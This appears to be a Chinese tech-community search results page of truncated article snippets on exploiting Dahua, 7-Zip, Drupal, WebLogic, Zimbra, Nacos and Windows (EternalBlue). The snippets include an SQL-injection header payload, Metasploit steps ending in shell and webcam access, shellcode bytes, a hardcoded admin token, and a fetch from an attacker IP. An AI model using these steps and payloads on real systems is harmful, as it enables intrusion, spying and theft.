首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏FreeBuf

    CISA在漏洞利用列表中增加了7个新漏洞

    美国网络安全和基础设施安全局(CISA)在其积极漏洞利用的安全问题列表中新添加了7漏洞,其中包括来自Microsoft、Linux和Jenkins的漏洞。 所谓的已知被利用漏洞列表是在网络攻击中被积极利用并需要由联邦民事执行局(FCEB)机构修补的漏洞列表。 “具有约束力的操作指令(BOD) 22-01:为了降低已知被利用漏洞的重大风险,建立了已知被利用漏洞目录,将其作为对联邦企业具有重大风险的已知cve的动态列表”,CISA对此解释说。 编号为CVE-2022-29464的WSO2漏洞于2022年4月18日被披露,几天后,一个漏洞利用程序被公开。Rapid7研究人员很快就看到了在攻击中使用公共PoC来部署网络外壳和硬币矿工。 最后,CISA强烈建议所有安全专业人员和管理员查看已知被利用漏洞目录,并在其环境中修补任何漏洞

    92820编辑于 2022-06-08
  • 来自专栏网络安全攻防

    漏洞利用】最新大华综合漏洞利用工具

    项目介绍 此项目主要用于在授权情况下对大华系列产品进行漏洞检测 漏洞支持 大华综合漏洞利用工具 收录漏洞如下: 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 大华DSS数字监控系统itcBulletin注入漏洞 大华智慧园区综合管理平台信息泄露漏洞 大华智慧园区综合管理平台getNewStaypointDetailQuery 任意文件上传漏洞 大华智慧园区综合管理平台emap任意文件上传漏洞 大华智慧园区综合管理平台searchJson注入漏洞 大华DSS数字监控系统attachment_getAttList.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 根据程序版本优化,添加新版本的Poc webshell利用模块 大华智慧园区综合管理平台poi任意文件上传漏洞 大华智慧园区综合管理平台video任意文件上传漏洞 ,即可开始检测 cmdshell模块 选择模块进行漏洞验证,如果存在,在cmdshell输入你要执行的命令即可 webshell利用模块: 内置Godzilla Behinder jspcmdshell

    2.5K10编辑于 2024-06-21
  • 来自专栏网络安全技术点滴分享

    7-Zip CVE-2025-11001漏洞利用工具

    CVE-2025-11001 漏洞利用工具这是一个针对CVE-2025-11001漏洞的Python利用工具。 该漏洞影响7-Zip 21.02至25.00版本,允许攻击者通过特制的ZIP文件在具有管理员权限的7-Zip中实现任意文件写入。 功能特性自动化漏洞利用:自动生成包含符号链接的特制ZIP文件灵活配置:可自定义目标路径、输出文件名和数据文件精确控制:支持自定义顶层目录和链接名称跨平台兼容:基于Python开发,可在多平台运行安全测试 :仅影响Windows平台7-Zip必须以管理员权限运行受影响的7-Zip版本:21.02 - 25.00漏洞详情请参阅技术博客核心代码主执行脚本 (exploit.py)import argparseimport :利用7-Zip在处理包含符号链接的ZIP文件时的缺陷,当7-Zip以管理员权限运行时,会创建符号链接并写入文件到符号链接指向的位置,从而实现任意文件写入。

    25910编辑于 2025-12-26
  • 来自专栏网络安全技术点滴分享

    Drupal 7.x 安全漏洞利用与渗透测试

    项目标题与描述Drupal 7.x SQL注入利用工具本项目是一个针对已知高危漏洞“Drupalgeddon”(SA-CORE-2014-005)的安全研究项目。 它提供了一个Python脚本,可利用Drupal 7.x版本中的SQL注入漏洞,从数据库提取管理员密码哈希,并集成drupalpass模块进行本地破解。 该项目旨在用于受控的教育和学术环境,以帮助安全研究人员和开发者理解此类漏洞的严重性及利用原理,从而提升系统安全防护意识。 功能特性漏洞利用自动化:自动化执行针对Drupal 7.x(SA-CORE-2014-005)SQL注入漏洞的攻击流程。 教育性渗透测试流程:项目文档详细描述了从信息收集(Nmap扫描)、漏洞识别(Drupal版本检测)到实际漏洞利用的完整黑盒渗透测试场景,具有很高的学习参考价值。

    17910编辑于 2026-01-20
  • 来自专栏网络安全技术点滴分享

    7-ZiProwler:CVE-2025-11001 漏洞利用工具

    项目标题与描述7-ZiProwler (CVE-2025-11001)这是一个针对CVE-2025-11001漏洞7-Zip路径遍历漏洞)编写的概念验证(PoC)利用工具。 该漏洞源于7-Zip(25.00版本之前)在Windows系统上处理包含Linux风格符号链接的ZIP压缩包时存在缺陷,攻击者可利用漏洞实现任意文件写入,从而可能导致权限提升或系统被控制。 遵循漏洞原理:严格遵循CVE-2025-11001的漏洞成因,即利用相对路径处理不当导致的目录遍历。安装指南前提条件Python 3.x包管理工具:推荐使用 uv 或 pip。 触发漏洞将生成的ZIP文件(如result.zip)在存在漏洞7-Zip版本(< 25.00)的Windows系统上解压。 漏洞触发:当存在漏洞7-Zip解压此ZIP时,会错误解析符号链接,将载荷文件写入到target指定的系统目录中,覆盖原有文件。

    16210编辑于 2025-12-29
  • 来自专栏全栈程序员必看

    XFF漏洞利用

    作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XFF漏洞 X-Forwarded-For(XFF) 利用方式 1.绕过服务器过滤 2 X-Forwarded-For: client1, proxy1, proxy2, proxy3 //浏览器IP,第一个代理服务器,第二个三个四个等等 利用方式 1.绕过服务器过滤 XFF漏洞也称为IP 的header头部注入原理一样,服务器端会对XFF信息进行记录, 但没有进行过滤处理,就容易导致sql注入的产生 X-Forwarded-for: 127.0.0.1' and 1=1# 然后进一步利用

    3.2K10编辑于 2022-07-04
  • 来自专栏黑客技术家园

    如何 对 windows7的永恒之蓝漏洞利用

    首先我们要知道window7的IP地址,cmd中输入ipconfig中得知 ? 2. 打开kali的终端,看看能不能ping通win7的ip 如下图就是没得问题了 ? 3. #下的1是我们要使用的第一个模块,目的是用来扫描win7系统是否存在这个漏洞 我们输入 use 1 show options12 ? 当初先如图的时候,我们的第一个环节结束,意思就是win7这个系统可以被利用 4、再打开一个终端,我们要开始攻击了 同样的步骤,终端中打开msfconsole,然后search ms17_010,然后use 也许这个时候会报错,那说明你的win7摄像头没有,如何确定自己win7的摄像头开了呢,如下图,就是win7开着摄像头呢 ? 第二个红框内就是win7的cmd,我们通过这个来看一下win7的ip地址 ? ? (3)截图 先退出win7的cmd后我们输入 ? 输入指令后kali界面就会跳出一个截图。

    2.1K20发布于 2021-04-02
  • 来自专栏网络信息安全

    KaLi 对 windows7的永恒之蓝漏洞利用

    KaLi 对 windows7的永恒之蓝漏洞利用 1. 首先我们要知道window7的IP地址,cmd中输入ipconfig中得知 2. 再输入指令 search ms17_010 #下的1是我们要使用的第一个模块,目的是用来扫描win7系统是否存在这个漏洞 我们输入 use 1 show options 这个时候我们要用到之前了解到的 意思就是win7这个系统可以被利用 4、再打开一个终端,我们要开始攻击了 同样的步骤,终端中打开msfconsole,然后search ms17_010,然后use 2(这里使用use 2的意思就是要攻击了 ,现在我们来挨个实现我们的操作: (1)我们先来控制一下win7的摄像头,指令如下: webcam_stream 也许这个时候会报错,那说明你的win7摄像头没有,如何确定自己win7的摄像头开了呢, (2)拿shell 指令就一句话 shell 第二个红框内就是win7的cmd,我们通过这个来看一下win7的ip地址 (3)截图 先退出win7的cmd后我们输入 输入指令后kali界面就会跳出一个截图

    95210编辑于 2024-03-12
  • 来自专栏FreeBuf

    Nebula漏洞利用包CVE-2016-0189漏洞利用分析

    Nebula EK包中对CVE-2016-0189的漏洞利用,比其它漏洞利用包的漏洞利用方有了一定改进,这里进行一下深入分析。 本文试图利用windbg来分析漏洞利用时的内存布局,使得读者对该漏洞利用有更深刻的理解。 2. CVE-2016-0189的关键知识点 CVE-2016-0189是个关于VBScript的漏洞。 这似乎并没有太大问题,然而我们看一下漏洞利用脚本的valueOf函数 ? 这里脚本并未实现任意值的写入,然而并不影响漏洞利用。 9A%84%E5%BE%AE%E8%BD%AF%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BF%9C%E7%A8%8B%E4%BB%A3%20%E7%A0%81%E6%89%A7%E8%

    1.9K60发布于 2018-02-24
  • 来自专栏全栈工程师修炼之路

    DNS漏洞利用实践

    [TOC] 很多dns探测工具,都会首先尝试dns区域传送,然后才是暴力枚举,那么什么是DNS区域传送漏洞呢? 区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的zone数据库。 使用dig工具可以检测dns 区域传送漏洞,语法如下: dig axfr @域名服务器 被检测域名 示例: root@kali-xuanhun:~# dig @wormhole.movie.edu movie.edu zonetransfer.me when making DNS changes” zonetransfer.me. 301 IN TXT “google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA

    1K10编辑于 2022-09-29
  • 来自专栏sktj

    python 漏洞利用脚本

    \x0f\x03\x7d\x53\xc8\xe4\x4f" "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8" "\x7e\x72\ \xf5" "\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c" "\x56\x22\x1c\x43\x22\x98\x1f\x94\ \xb2\x5a\xf8\xaf\x32\x18\xdf" "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41" "\x40\x5c\ \x5b\x5a\xbc\xb9\x64\x5b\xea" "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8" "\xfa\x86\ \xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\

    1.2K10发布于 2019-07-31
  • nacos RCE漏洞利用

    poc检测 FoFa: app="nacos" bp8080监听需要开启 首先我们利用压缩包中的service.py,将它上传到38.12.31.36的机器上,然后在上传到的目标文件夹输入python service.py启动服务 再利用压缩包中的nacos RCE漏洞POC.py 在压缩包目录下输入cmd然后按下回车 在cmd中输入python nacosRCE漏洞POC.py 按下回车会出现一个三角尖 ,在三角处粘贴url路径 按下回车后便会自行开启检测 此poc可以将windows和linux系统都检测到 mstsc远程桌面连接windows 当我们利用漏洞检测工具检测到windows主机时 我们便可以利用压缩包中的

    33210编辑于 2025-07-14
  • 来自专栏知道创宇

    BlueKeep 漏洞利用分析

    IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 信道的定义字段主要是名字加上配置,配置主要包括了优先级等 在server 目的是将访问从服务器重定向到客户端文件系统,其数据头部将会主要是两种标识和PacketId字段组成: 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 在完全建立连接后,将会创建 IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: 可是在windowsxp中,直接发送 0x02 win7 EXP 池喷射简要分析 首先被释放的MS_T120池大小包括是0x170,池的标志是TSic 分析Win7 exp 可以知道数据占位是用的rdpsnd信道,作者没有采用rdpdr信道 9A%84%E5%A0%86%E5%96%B7%E6%8A%80%E6%9C%AF.html

    89220发布于 2019-09-20
  • 来自专栏WhITECat安全团队

    zimbra RCE 漏洞利用

    前言 近期在测试一个目标的时候发现对方好几个zimbra的服务器,按照网上提供的利用方法测试了之后发现利用不成功!接着自己搭建了zimbra在自己进行测试之后成功利用并且拿下zimbra服务器! 接着利用刚刚获取到的高权限的TOKEN 来进行文件上传,把webshell上传上去! requestId':(None,"12",None), } headers ={ "Cookie":"ZM_ADMIN_AUTH_TOKEN=0_65ae5d9b75c34c538cd72a658f7de7d32a9ec7f9 实战 zimbra RCE 复现这个漏洞主要就是遇到了这个邮箱服务器!并且存在XXE读取文件!前面的准备都是为了这一刻!!!!! 首先获取它的数据包,利用了CVE-2019-9670 XXE漏洞来读取配置文件。Zimbra配置文件位置为/conf/localconfig.xml。

    5.2K10发布于 2020-11-25
  • 来自专栏Bypass

    Fastjson 漏洞利用技巧

    每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。 如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。 ---- 01、自动化漏洞检测 一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。 Github项目地址: https://github.com/pmiaowu/BurpFastJsonScan 02、简化攻击步骤 在这里我们可以使用一款JNDI服务利用工具,来简化fastjson 漏洞检测的步骤,辅助漏洞利用和渗透。 Github项目地址: https://github.com/wyzxxz/jndi_tool Fstjson漏洞利用: (1)开启RMI服务 java -cp jndi_tool.jar jndi.EvilRMIServer

    1.6K20编辑于 2022-06-24
  • 来自专栏黑白天安全团队

    Weblogic漏洞利用总结

    成功反弹 CVE-2019-2618 漏洞简述 利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台 该漏洞有两个利用手法 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 DNSLOG的使用 DNSLOG可以在某些无法直接利用漏洞获得回显的情况下, 但是目标可以发起DNS ssrf漏洞 漏洞描述 Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 7.然后可以进入redis容器中查看定时任务 定时任务存放地址为 /etc/corntab ?

    5.2K20发布于 2021-03-16
  • 来自专栏Seebug漏洞平台

    BlueKeep 漏洞利用分析

    IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 ? 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 ? 在完全建立连接后,将会创建rdpdr信道的结构体 ? IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: ? 占位被free的实际数据大小为0x128,利用的中转地址是0xfffffa80ec000948 ? 9A%84%E5%A0%86%E5%96%B7%E6%8A%80%E6%9C%AF.html

    76430发布于 2019-09-20
  • 来自专栏全栈程序员必看

    ewebeditor漏洞利用总结

    4、说说漏洞基本利用步骤,还以asp为例! 登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。. 先贴漏洞利用方式! 7、目录遍历漏洞! 这里大概说一下! 这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法! 漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..

    1.8K20编辑于 2022-09-14
  • 来自专栏黑白天安全团队

    Jboss漏洞利用总结

    影响版本 Jboss4.x以下 漏洞利用 输⼊url http://目标IP:8080/jmx-console/HtmlAdaptor? CVE-2007-1036漏洞相同,唯一的区别是CVE-2006-5750漏洞利用methodIndex进行store()方法的调用。 影响版本 JBoss AS 4.x及之前版本 漏洞利用 1、首先验证目标jboss是否存在此漏洞,直接访问 /jbossmq-httpil/HTTPServerILServlet 路径下。 若访问200,则可能存在漏洞。 ? 此处我们使用JavaDeserH2HC工具来利用漏洞,尝试直接弹回一个shell javac -cp . 漏洞利用 首先从http响应头和title中一般情况下都能看到信息来确定目标 jboss 版本是否在此漏洞版本范围 ? 现成工具 ?

    7K30发布于 2020-08-04
  • nacos RCE漏洞利用

    Nacos RCE 漏洞检测与利用教程Poc检测FoFa 搜索语法:app="nacos"准备工作:开启 BP8080 监听上传 service.py 到攻击机 (38.12.31.36)在目标目录执行 :python service.py图片漏洞检测:在压缩包目录打开 CMD图片执行检测命令:python nacosRCE漏洞POC.py图片粘贴目标 URL 路径图片自动检测结果图片该 POC 可同时检测 Windows/Linux 系统Windows 系统利用 (mstsc)检测到 Windows 主机:图片执行 EXP:运行:python exp.py图片输入目标 URL(格式:http://x.x.x.x /hello.txt http://38.12.31.36:8000/hello.txt图片验证下载成功图片图片漏洞利用工具下载 工具下载链接 内容结束

    31110编辑于 2025-07-11
领券